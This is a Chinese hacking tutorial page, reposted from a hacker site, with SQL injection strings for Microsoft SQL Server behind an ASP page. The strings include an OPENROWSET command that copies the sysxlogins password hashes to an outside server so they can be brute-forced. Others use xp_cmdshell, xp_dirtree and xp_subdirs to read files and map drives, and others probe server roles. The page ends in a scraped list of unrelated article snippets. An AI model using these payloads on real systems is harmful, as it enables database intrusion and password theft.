这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下: insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', ...

这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下:

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins

  得到hash之后,就可以进行暴力破解。这需要一点运气和大量时间。

  遍历目录的方法:

  先创建一个临时表:temp

'5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

5';insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

5';insert into temp(id) exec master.dbo.xp_subdirs 'c:/';-- 获得子目录列表

5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- 获得所有子目录的目录树结构,并寸入temp表中

5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:/web/index.asp';-- 查看某个文件的内容

5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/';--

5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/ *.asp /s/a';--

5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:/Inetpub/AdminScripts/adsutil.vbs enum w3svc'

5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- (xp_dirtree适用权限PUBLIC)

写入表:

语句1:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

语句2:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('serveradmin'));--

语句3:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('setupadmin'));--

语句4:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

语句5:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

语句6:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('diskadmin'));--

语句7:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

语句8:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

语句9:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER('db_owner'));--

把路径写到表中去:

_blank>http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)-

_blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert  dirs exec master.dbo.xp_dirtree 'c:/'-

_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-

_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))-

语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--

语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'e:/web'--

语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)-

本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接:http://www.hackbase.com/tech/2009-04-17/52294.html

SQL旁注精华珍藏版代码相关推荐

  1. 物流信息管理系统MySQL设计,物流管理系统的SQL数据库设计(含代码)

    物流管理系统的SQL数据库设计(含代码) 物流管理信息系统的数据库设计班级xxx系统名称:物流管理信息系统一.需求分析物流管理系统是为制造商和零售商设计的管理系统数据库系统,目的是:1.实现上游制造商 ...

  2. /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -

    DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...

  3. SQL server数据库常用代码大全

    SQL 语句目录 插入数据表数据 INSERT INTO 测试表(商品ID,商品名称,规格,型号,属性,分类,价格) VALUES ('SP0009','安宫牛黄丸','10粒/盒','A-1245' ...

  4. 唐诗宋词 v3.0 软件下载 唐诗宋词三百首 唐诗三百首 宋词三百首 唐诗三百首下载 宋词三百首下载 SQL优化前后的代码:...

    v3.0 加快了诗词数据加载速度,诗词总页数达4500页    下载地址 v3.1.5 下载地址 v3.2 完善了所有功能 下载地址 华军下载: http://www.newhua.com/soft/ ...

  5. ASP.NET将EXCEL导入SQL SERVER数据库的代码

    ASP.NET将EXCEL导入SQL SERVER数据库的代码 2007-11-13 10:36 在网上找到一个Asp.Net将Excel数据导入Sql Server数据库的的例子,是调用存储过程的, ...

  6. SQL 存储过程 procedure 讲解+代码实例

    文章目录 1. 存储过程概述 2. 创建存储过程 create procedure 2.1. 参数 in.out.inout 3. 调用存储过程 call 4. 查看存储过程 4.1. 查看存储过程的 ...

  7. (续)Visual Studio 连接SQL Server数据库,代码连接

    (续)Visual Studio 连接SQL Server数据库,代码连接(参考项目https://gitee.com/qmagician/book-management-system) 昨天已经将数 ...

  8. SQL 函数 function 讲解+代码实例

    文章目录 1. 对存储程序的说明 2. 创建函数 create function 3. 调用函数 select 4. 查看函数 4.1. 查看函数状态 show status 4.2. 查看函数定义 ...

  9. 【正则表达式】sql语句去掉注释代码

    文章目录 1.美图 1.美图 该方法,能在保持原有代码的情况下,比如大小写,换行,缩进等信息,去除sql中的各种注释 代码如下 Pattern p = Pattern.compile("(? ...

最新文章

  1. 学习excel的使用技巧一空格替换为0
  2. c++面试中遇到的问题
  3. spring-cloud导入eclipse时,@slf4j注解为什么找不到log变量
  4. 后来的我们王俊凯王源机器人_王俊凯杨紫到底是什么关系
  5. 拦截导弹(信息学奥赛一本通-T1260)
  6. netty中的引导Bootstrap服务端
  7. OpenCV计算机视觉实战(Python版)_004图像形态学处理
  8. php rest api lumen,lumen Rest API 起步
  9. c++ post请求_Golang GinWeb框架5绑定请求字符串/URI/请求头/复选框/表单类型
  10. python main传参args,详解用Python处理Args的3种方法
  11. SQL Service安装教程
  12. Python中的 SciPy 样条曲线插值
  13. 利用华为ENSP模拟器分析和配置中小型企业网络的综合实验(下)
  14. 秋招历险记-计算机网络篇
  15. Spring Cloud微服务实战
  16. 仿ios相机apk_iCamera仿苹果相机app下载-iCamera仿苹果相机下载app手机版 v4.0-第六手游网...
  17. Electron如何修改图标
  18. TiddlyWiki笔记入门之多维度标签--发散思维与收敛思维的乐园。
  19. 光电开关与光耦的区别 - 光电开关电子电路图
  20. [人工智能-深度学习-4]:数据流图与正向传播、动态图与静态图

热门文章

  1. Oracle数据库之多表查询
  2. 怎么解决java.lang.NoClassDefFoundError错误
  3. 直接在Dao层进行测试的问题
  4. 计算机网络(三)计算机网络-物理层 | 物理设备与传输介质(思维导图 | 知识点总结)
  5. Xmanager连接Linux桌面异常解决方案
  6. 位操作的应用:无参数交换数据,异或加密,循环移位加密【位操作】(56)
  7. mysql slave是什么_创建slave的搜索结果-阿里云开发者社区
  8. java代码块执行顺序_Java笔记 | Java代码块执行顺序测试
  9. shell去掉字符两端字符_Shell脚本8种字符串截取方法总结
  10. 运维一定要懂的100个网络安全小知识